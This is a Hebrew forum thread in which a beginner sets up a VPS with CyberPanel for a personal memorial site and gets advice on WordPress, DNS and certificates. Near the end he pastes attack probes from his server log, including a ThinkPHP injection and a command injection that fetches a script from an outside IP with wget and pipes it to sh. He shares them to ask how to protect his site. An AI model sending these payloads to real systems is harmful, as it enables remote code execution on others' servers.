בנית/אחסון שרת - עמוד 2 - טכנולוגיית מידע - IT - HWzone פורומים
עבור לתוכן
  • צור חשבון

בנית/אחסון שרת

eido300
 Share

Recommended Posts

ציטוט של eido300

אם עכשיו אתקין על השרת גם wordpress זה ילך ביחד? כי ראיתי שסייברפנל רוצעם המון כסף על וורדפרס דרכם

וורדפרס זאת מערכת חינמית. אתה יכול להתקין אותה בעצמך.

קישור לתוכן
שתף באתרים אחרים

סליחה אבל מרגיש לי שקפצתם אלף שלבים קדימה בלי באמת להבין מה בכלל הדרישות.

בוא תסביר רגע מה בדיוק אתה רוצה לעשות. מה האתר אמור להיות, מה הוא אמור להציג, מה הוא אמור לעשות, מי אמור לעשות את זה.. פרטים יותר פרקטיים.

רצת מהר לקנות VPS בלי להסתכל לצדדים ובלי להבין בכלל מה תעשה עם השרת, קצת מיותר... אם וורדפרס יוכל לספק לך פיתרונות לכל מה שאתה צריך (סביר שכן) אתה יכול למצוא שירותי אתרי וורדפרס מנוהלים במחירים זולים מאוד ובתחזוקה מינימלית ברמה הטכנית.

קישור לתוכן
שתף באתרים אחרים

ציטוט של Jabberwock

ורדפרס זאת מערכת חינמית. אתה יכול להתקין אותה בעצמך.

אני קצת מבולבל, לא כ"כ מבין איך זה עובד...  הרי סייברפנל אחראים על ניהול השרת, ואם אני מתקין את הוורדפרס על השרת גם, זה לא יסתור אחד את השני? או שלא יוכלו לתקשר ביניהם?

ציטוט של Milford Cubicle

בוא תסביר רגע מה בדיוק אתה רוצה לעשות. מה האתר אמור להיות, מה הוא אמור להציג, מה הוא אמור לעשות, מי אמור לעשות את זה.. פרטים יותר פרקטיים.

האתר הוא זה, בעקרון כרגע אתר למכירת אותיות בס"ת לע"נ הנרצחים והחללים במלחמה הארורה הזאת, מכיון שזה פרויקט אישי ואין לו תקציב, השתדלתי ללכת על הכי זול, שזה אומר סייט + סקריפט (לניהול כל המאחורי הקלעים שזה בעצם עיבוד הקניות שהושלמו, בגדול - קבלת ועיבוד האישורים משרת הסליקה, הכנסה לטבלאות excel פרטיות וכלליות והצגת גרפים) + שיטס. דומיין כדי שיראה נורמאלי וזהו.

לאחרונה סגרו לי את האתר, עדיין לא ברור לי למה, פתחתי חדש ואחרי שניה וחצי סגרו גם אותו, אין ברירה אלא לפתוח שרת חדש, אז בהמלצת ידידנו כאן שכרתי שרת, נכון לעכשיו האתר הוא אותו קוד כמו המקורי, ועדיין עם אותה מערכת של גוגל סקריפט, אני לא סגור על זה שהיא כ"כ בטיחותית אז אצטרך לכתוב מערכת חדשה שתעשה את העבודה של הישנה. זה כשלעצמו מאתגר כי אין לי מושג איך עושים את זה, את המערכת הראשונה לקח לי המוווון זמן לכתוב, תוך כדי למידה, כמובן... עכשיו זה לעבור למערכת אחרת, שפה אחרת, צורת עבודה שונה. יהיה מעניין.

לכן, לדעתי סתם וורדפרס לא יספיק, כמו שהצלחתי להבין, ואני לא מבין גדול בתחום, בקושי קטן למעשה.

קישור לתוכן
שתף באתרים אחרים

ציטוט של eido300

הרי סייברפנל אחראים על ניהול השרת, ואם אני מתקין את הוורדפרס על השרת גם, זה לא יסתור אחד את השני? או שלא יוכלו לתקשר ביניהם?

אתה יכול ליצור סאב-דומיין ב-box ע"י רשומת A.

למשל blog.stamandsefer.co.il ובממשק של הסייברפאנל יוצר אתר על השם דומיין הזה ומתקין את הוורדפרס.

קישור לתוכן
שתף באתרים אחרים

החברה של האחסון כתבה לי שהוציאו שרתים יותר טובים ויותר זולים: 

CX22NEW
2Intel
4 GB
40 GB
€0.005 / h
€3.29 / mo

שהוא יותר טוב משלי, באותו מחיר וכנראה בעתיד יחליף אותו לגמרי.
כדאי להחליף אליו מעכשיו? הוא באמת טוב?

הסתבכתי עם הישן (לא מצליחים להכנס או לאפס את הסיסמא גם לא דרך הchroot), אז בכל מקרה אחליף...

נערך על-ידי eido300
קישור לתוכן
שתף באתרים אחרים

מה עושים אם מחקתי את השרת הקודם, קניתי חדש התקנתי cyberpanel מחדש ועכשיו lets encrypt לא מוכנים להביא לי תעודה חדשה כי הדומיין שלי כבר רשום אצלם?

טוב הביאו לי תעודה אבל זה מוזר, האתר עם תעודה והפאנל ניהול בלי...

נערך על-ידי eido300
קישור לתוכן
שתף באתרים אחרים

ציטוט של eido300
שהוא יותר טוב משלי, באותו מחיר וכנראה בעתיד יחליף אותו לגמרי.
כדאי להחליף אליו מעכשיו? הוא באמת טוב?

אלו לא שרתים חדשים. הם פשוט הורידו מחירים על שרתי האינטל הישנים שלהם.

ציטוט של eido300

ועכשיו lets encrypt לא מוכנים להביא לי תעודה חדשה כי הדומיין שלי כבר רשום אצלם

אתה צריך לעדכן את האייפי ברשומת ה-A שיצרת ב-BOX.

ציטוט של eido300

האתר עם תעודה והפאנל ניהול בלי

אפשר לסדר את זה בהגדרות של פאנל הניהול. לא זוכר בדיוק איפה

קישור לתוכן
שתף באתרים אחרים

בקובץ הלוג של האתר יש כל מיני בקשות כל הזמן, למרות שאף אחד לא ניגש לאתר.

לדוגמא: 

"GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"

GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1

ועוד...

זה תקין?

קישור לתוכן
שתף באתרים אחרים

אההה

אז מה עושים עם המידע הזה? לא נעים לשמוע שמנסים לפרוץ לאתר...

אני מתכון, אילו צעדים צריך לעשות כדי להמנע מפריצה

נערך על-ידי eido300
קישור לתוכן
שתף באתרים אחרים

הצטרפ/י לדיון

בשלב זה תוכל/י להצטרף לדיון, ולאחר מכן להצטרף לקהילה שלנו. אם כבר יש לך חשבון אצלנו, אנא התחבר/י עכשיו על מנת להגיב תחת שם המשתמש שלך.
לתשומת לבך: התגובה תופיע לגולשים לאחר אישור של צוות הנהלת הפורומים.

אורח
הוסף תגובה

×   התוכן שהודבק הוא עם עיצוב.   הסר עיצוב

Only 75 emoji are allowed.

×   הקישור שלך הוטמע אוטומטית.   הצג כקישור רגיל

×   התוכן הקודם שלך שוחזר אוטומטית.   נקה הכל

×   You cannot paste images directly. Upload or insert images from URL.

Share

• צור חדש...